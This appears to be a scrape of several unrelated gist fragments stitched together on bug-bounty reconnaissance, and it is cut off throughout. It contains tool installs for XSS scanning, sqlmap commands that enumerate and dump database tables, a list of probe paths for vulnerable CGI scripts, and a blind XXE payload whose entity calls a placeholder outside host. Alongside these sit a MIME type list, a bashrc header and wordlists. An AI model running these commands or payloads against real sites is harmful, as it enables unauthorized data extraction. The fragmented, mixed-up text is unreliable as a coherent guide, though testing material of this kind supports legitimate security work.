This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt| ### | |
| # ▶ go get -u github.com/lc/gau | |
| # ▶ go get -u github.com/tomnomnom/qsreplace | |
| # ▶ go get -u github.com/tomnomnom/hacks/kxss | |
| # ▶ go get -u github.com/hahwul/dalfox | |
| # ▶ git clone https://github.com/dwisiswant0/DSSS | |
| ### | |
| gauq() { |
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump| TiVoConnect?Command=QueryServer | |
| TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes | |
| cgi-bin/cart32.exe | |
| cgi-bin/classified.cgi | |
| cgi-bin/download.cgi | |
| cgi-bin/flexform.cgi | |
| cgi-bin/flexform | |
| cgi-bin/lwgate.cgi | |
| cgi-bin/LWGate.cgi | |
| cgi-bin/lwgate |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200 |
| # from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types | |
| application/1d-interleaved-parityfec | |
| application/3gpdash-qoe-report+xml | |
| application/3gpp-ims+xml | |
| application/a2l | |
| application/activemessage | |
| application/alto-costmap+json | |
| application/alto-costmapfilter+json | |
| application/alto-directory+json |
| #-------------------------------------------------------------------------------------------- | |
| # if found on gist use `git clone https://gist.github.com/650d59476b86fbe885e66af953099006.git .` | |
| # this is a modified version of Emmanuel Rouat [no-email] bashrc how to which can be found at | |
| # `http://tldp.org/LDP/abs/html/sample-bashrc.html` | |
| #-------------------------------------------------------------------------------------------- | |
| # If not running interactively, don't do anything | |
| [ -z "$PS1" ] && return | |
| #------------------------------------------------------------- |
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |